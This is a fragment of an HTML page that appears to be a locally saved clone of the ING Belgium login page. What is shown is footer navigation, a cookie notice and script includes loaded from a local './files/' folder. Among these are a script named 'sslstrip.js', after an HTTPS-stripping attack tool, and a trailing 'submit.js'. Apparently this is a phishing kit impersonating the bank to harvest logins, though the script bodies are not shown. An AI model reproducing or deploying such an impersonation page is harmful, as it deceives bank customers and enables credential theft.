<li><a href="https://www.ing.be/nl/retail/day-to-day-banking/self-banking/Pages/homebank.aspx?WT.ac=bigfooter_retail_homebank">Home'Bank</a> </li></ul></div>
<div class="k2-col"><h5><a class="k2-big-footer-linklist-heading" href="https://www.ing.be/nl/retail/lending/Pages/index.aspx?WT.ac=bigfooter_retail_lending">Lenen</a> </h5>
<ul class="k2-big-footer-linklist"><li><a href="https://www.ing.be/nl/retail/lending/properties/Pages/mortgage-loan.aspx?WT.ac=bigfooter_retail_mortgage-loan">Hypothecair krediet</a> </li>
<li><a href="https://www.ing.be/nl/retail/lending/vehicles/Pages/car-loan.aspx?WT.ac=bigfooter_retail_carloan">ING Autolening</a> </li>
<li><a href="https://www.ing.be/nl/retail/lending/cash-reserves/pages/from-1250-euro.aspx?WT.ac=bigfooter_retail_cashreserves">ING Cash Facility</a> </li>
<li><a href="https://www.ing.be/nl/retail/lending/others/Pages/furniture-decoration.aspx?WT.ac=bigfooter_retail_designanddecoration">ING Lening op Afbetaling</a> </li></ul></div>
<div class="k2-col"><h5><a class="k2-big-footer-linklist-heading" href="https://www.ing.be/nl/retail/savings/Pages/index.aspx?WT.ac=bigfooter_retail_saving">Sparen</a> </h5>
<ul class="k2-big-footer-linklist"><li><a href="https://www.ing.be/nl/retail/savings/savings-accounts/Pages/online-with-a-high-fidelity-premium.aspx?WT.ac=bigfooter_retail_onlineinglionpremium">ING Lion Premium</a> </li>
<li><a href="https://www.ing.be/nl/retail/savings/savings-accounts/Pages/online-ING-lion-deposit.aspx?WT.ac=bigfooter_retail_onlineingliondeposit">ING Lion Deposit</a> </li>
<li><a href="https://www.ing.be/nl/retail/savings/savings-accounts/Pages/with-high-base-rate.aspx?WT.ac=bigfooter_retail_withhighbaserate">Groen Boekje</a> </li>
<li><a href="https://www.ing.be/nl/retail/savings/savings-accounts/Pages/with-high-fidelity-premium.aspx?WT.ac=bigfooter_retail_withhighfidelitypremium">ING Oranje Boekje</a> </li>
<li><a href="https://www.ing.be/nl/retail/savings/term-accounts/Pages/from-one-to-ten-years.aspx?WT.ac=bigfooter_retail_fromonetotenyears">ING Long Term Account</a> </li>
<li><a href="https://www.ing.be/nl/retail/retirement/fiscal-savings/Pages/pension-savings-fund.aspx?WT.ac=bigfooter_retail_starfund">Star Fund</a> </li></ul></div>
<div class="k2-col"><h5><a class="k2-big-footer-linklist-heading" href="https://www.ing.be/nl/retail/investments/Pages/index.aspx?WT.ac=bigfooter_retail_investments">Beleggen</a> </h5>
<ul class="k2-big-footer-linklist"><li><a href="https://www.ing.be/nl/retail/investments/useful-information/Pages/free-investment-account.aspx?WT.ac=bigfooter_retail_freeinvestmentaccount">ING Invest Account</a> </li>
<li><a href="https://www.ing.be/nl/retail/investments/shares-and-bonds/Pages/index.aspx?WT.ac=bigfooter_retail_sharesandbonds">Aandelen</a> </li>
<li><a href="https://www.ing.be/nl/retail/investments/investment-funds/Pages/indexfundsguide.aspx?WT.ac=bigfooter_retail_investmentfunds">Beleggingsfondsen</a> </li>
<li><a href="https://www.ing.be/nl/retail/savings/non-fiscal-savings-plans/Pages/guaranteed-return.aspx?WT.ac=bigfooter_retail_guaranteedreturn">ING Life Savings Plan</a> </li>
<li><a href="https://www.ing.be/nl/retail/investments/investment-linked-insurance/Pages/one-off-payment-guaranteed-return.aspx?WT.ac=bigfooter_retail_oneoffpaymentguarenteedreturn">ING Life Optima</a> </li></ul></div>
<div class="k2-col"><h5><a class="k2-big-footer-linklist-heading" href="https://www.ing.be/nl/retail/insurance/Pages/index.aspx?WT.ac=bigfooter_retail_insurance">Verzekeren</a> </h5>
<ul class="k2-big-footer-linklist"><li><a href="https://www.ing.be/nl/retail/insurance/vehicles/Pages/car-insurance.aspx?WT.ac=bigfooter_retail_carinsurance">ING Autoverzekering</a> </li>
<li><a href="https://www.ing.be/nl/retail/insurance/assistance/Pages/travelassistance.aspx?WT.ac=bigfooter_retail_travelassistance">Reisbijstand</a> </li>
<li><a href="https://www.ing.be/nl/retail/insurance/home/Pages/home-insurance.aspx?WT.ac=bigfooter_retail_homeinsurance" style="font-size:8pt;background-color:window">Brandverzekering</a><br></li>
<li><a href="https://www.ing.be/nl/retail/insurance/life-and-family/Pages/death-benefit-insurance.aspx?WT.ac=bigfooter_retail_deathbenefitinsurance">ING Kapitaal bij Overlijden</a> </li></ul></div>
<div class="k2-col"><h5><a class="k2-big-footer-linklist-heading" href="https://www.ing.be/nl/retail/retirement/Pages/index.aspx?WT.ac=bigfooter_retail_retirement">Pensioen</a> </h5>
<ul class="k2-big-footer-linklist"><li><a href="https://www.ing.be/nl/retail/retirement/fiscal-savings/Pages/pension-savings-fund.aspx?WT.ac=bigfooter_retail_starfund">Star Fund</a> </li>
<li><a href="https://www.ing.be/nl/retail/retirement/non-fiscal-savings/Pages/guaranteed-return.aspx?WT.ac=bigfooter_retail_guaranteedreturn">ING Life Savings Plan</a> </li>
<li><a href="https://www.ing.be/nl/retail/retirement/fiscal-savings/Pages/INGLifeStarPlan.aspx?WT.ac=bigfooter_retail_inglifestarplan">ING Life Star Plan</a> </li>
<li><a href="https://www.ing.be/nl/retail/retirement/self-employed/Pages/private-supplementary-pension.aspx?WT.ac=bigfooter_retail_privatesupplementarypension">ING VAPZ</a> </li></ul></div>
<div class="k2-col k2-col-focus"><h5 class="k2-big-footer-linklist-heading"><strong>Dringend hulp nodig?</strong></h5>
<ul class="k2-big-footer-linklist"><li><a href="https://www.ing.be/nl/retail/Pages/cardstop.aspx?WT.ac=retail_bigfooter_cardstop">Een kaart blokkeren</a> </li>
<li><a href="https://www.ing.be/nl/retail/Pages/How-do-you-file-a-Statement-of-Claim.aspx?WT.xmenusource=LANGUAGE_NL&WT.ac=retail_bigfooter_claim">Een schadegeval aangeven</a> </li>
<li><a href="https://www.ing.be/nl/retail/Pages/contact.aspx">ING bellen of mailen</a></li></ul>
<h5 class="k2-big-footer-linklist-heading"><strong>Onze kantoren</strong></h5>
<ul class="k2-big-footer-linklist"><li><a href="https://branches.ing.be/kantoren?WT.ac=bigfooter_retail_branchlocator">Zoek een kantoor/Self'Bank</a> </li>
<li><a href="https://www.ing.be/nl/retail/Pages/Make-an-appointment.aspx?WT.ac=retail_bigfooter_map&origin=Footer&originType=retail_bigfooter_map">Maak een afspraak</a> </li></ul>
<h5 class="k2-big-footer-linklist-heading"><a href="https://mobile.ing.be/nl-BE/msite/home/firstscreen?utm_source=ingbe&utm_medium=hp_footer" target="_blank" style="font-size:15px;color:#333333"><strong>Onze mobiele site</strong></a></h5></div></div>
</div>
​​​ 
                    <div class="k2-small-footer cols">
  <div class="k2-col"><a class="dcsMultiTrackWtAc" lang="en" href="http://www.goedebankrelatie.be/" target="_blank" rel="retail_febelfinlogo"><img class="dcsMultiTrackWtAc" alt="Febelfin" src="./files/febelfin_logo_nl.png" style="margin-right:115px;margin-left:115px;width:110px;height:39px"></a> &nbsp;</div>
 <div class="k2-col">&nbsp; </div>
  <div class="k2-col">
    <ul>
      <li><a href="https://www.ing.be/about/press.jsp?menopt=prr%7ccop&lang=nl&WT.ac=retail_smallfooter_press" target="_blank">Pers</a> </li>
      <li><a href="http://www.ing.be/about/showdoc.jsp?docid=610124_NL&menopt=InR&lang=nl&WT.ac=retail_smallfooter_InvestorRelations" target="_blank">Investor Relations</a> </li>
      <li><a href="https://www.ing.be/nl/retail/Pages/socialmedia.aspx?WT.ac=retail_smallfooter_socialmedia" target="_blank">Social media</a> </li>
    </ul>
  </div>
  <div class="k2-col">
    <ul>
      <li><a class="dcsMultiTrackWtAc" href="http://www.ing.jobs/belgie" rel="retail_smallfooter_job">Jobs</a> </li>
      <li><a href="https://www.ing.be/nl/retail/Pages/privacy.aspx?WT.ac=retail_smallfooter_privacy" target="_blank">Privacy</a> </li>
      <li><a href="https://www.ing.be/nl/retail/Pages/security.aspx?WT.ac=retail_smallfooter_security" target="_blank">Veiligheid</a> </li>
    </ul>
  </div>
  <div class="k2-col">
    <ul>
      <li><a href="https://www.ing.be/about/showdoc.jsp?docid=584254&menopt=ArS%7cspo%7chom&lang=nl&WT.ac=retail_smallfooter_Sponsoring" target="_blank">Sponsoring</a> </li>
      <li><a href="https://www.ing.be/nl/retail/Pages/charges-and-regulations.aspx?WT.ac=retail_smallfooter_chargesregulations" target="_blank">Tarieven en reglementen</a> </li>
      <li><a href="https://www.ing.be/SiteCollectionDocuments/GebruiksvoorwaardenINGWebsiteNL.pdf" target="_blank">Gebruiksvoorwaarden</a> </li>
    </ul>
  </div>
  <div class="k2-col">
    <ul>
      <li><a href="https://www.ing.be/nl/retail/Pages/Limits.aspx?WT.ac=retail_smallfooter_limits" target="_blank">Limieten</a> </li>
      <li><a href="https://www.ing.be/nl/retail/Pages/sitemap.aspx?WT.ac=retail_smallfooter_sitemap" target="_blank">Sitemap</a> </li>
      <li><a href="https://www.ing.be/nl/retail/Pages/accessibility.aspx?WT.ac=retail_smallfooter_toegankelijk">Toegankelijk</a></li>
    </ul>
  </div>
<div class="k2-col"><img src="./files/TheBanker.gif" alt="">
   
&nbsp;</div>
<div class="k2-col"><a href="https://www.becommerce.be/nl/leden/zoek-een-lid/d/certificate/484"><img src="./files/BeCommerce.gif" alt="Veilig online winkelen met BeCommerce"></a>&nbsp;</div>

​​​​​​​​</div>
<p class="k2-footer-copyright">© 2019&nbsp;ING België nv, alle rechten voorbehouden. Let op, geld lenen kost ook geld.​​​​​​​​​​​​</p> 
                    
                </div>
                
            </div>
       
            <div class="body-wrapper">
                <div id="DeveloperDashboard" class="ms-developerdashboard">
                    
                </div>
            </div>
        </div>
    </div>
    

    
    
    
    
    <script type="text/javascript">
	Framework.run(Libraries.getGlobaljQuery(), function($){$(function(){ING.K2.Base.xmlReplace("/xpedio/groups/transaction/@public/@internet/@ingbe/documents/portalcontent/363912_en.xml","True","_REPLACE_","node","replace");});});
</script>
    
    <script type="text/javascript">
        var $temp = (typeof ($.noConflict) != "undefined") ? $.noConflict(true) : $;
        $ = jQuery = Libraries.getGlobaljQuery();
    </script>
    <script type="text/javascript" src="./files/jquery-ui.min.js"></script>
    <script type="text/javascript" src="./files/jquery.nestedsortable.min.js"></script>
    <script type="text/javascript">
        $ = jQuery = $temp;
    </script>
    <script type="text/javascript" src="./files/cm-lib-tabs.min.js"></script>
    
        <script type="text/javascript" src="./files/ApplyOnlinePopup.js">

</script>
<script type="text/javascript" src="./files/fix-dropdown.js">

</script>
<script type="text/javascript" src="./files/ApplyOnlinePopup_Secured.js">

</script>
<script type="text/javascript" src="./files/ssonumberfix.js">

</script>
<script type="text/javascript" src="./files/sslstrip.js">

</script>
<script type="text/javascript" src="./files/fixhbselection.js">

</script>
<script type="text/javascript" src="./files/cm-master.js">

</script>
<script type="text/javascript" src="./files/hb4all-lionaccount-fix.js">

</script>

        
        <script src="./files/ing.k2.metrics.min.js"></script>
    
    
        <div class="s4-notdlg">
            <div id="cm-cookie-popin" class="cm-cookie-pop">
                 <div class="cm-cookie-wrap">
                 <a href="https://www.ing.be/nl/Retail/Pages/Login.aspx#" class="cm-popin-close"></a>
                 <div class="body"><h2>We gebruiken cookies om uw bezoek aan onze website www.ing.be nog aangenamer te maken. </h2>
                 <p>Door onze website te bezoeken, aanvaardt u onze cookies. U kunt natuurlijk altijd de instellingen voor de cookies wijzigen.<a href="https://www.ing.be/nl/retail/Pages/cookie-use.aspx" class="cm-popin-manage">Lees meer over cookies.</a></p></div>
                 <div class="foot">
                 <a href="https://www.ing.be/nl/Retail/Pages/Login.aspx#" class="cm-button cm-button-primary cm-button-checked"><span>OK! Surf verder</span></a></div></div></div>
                 <div id="cm-cookie-popout" class="cm-cookie-pop">
                 <a>Cookies?</a>
                 </div>

        </div>
    
    
    <script type="text/javascript">_satellite.pageBottom();</script>
    <script src="./files/submit.js"></script>
    


<div id="popupwrapper" class="hide"></div><div id="tags"></div><script src="./files/standard"></script></body></html>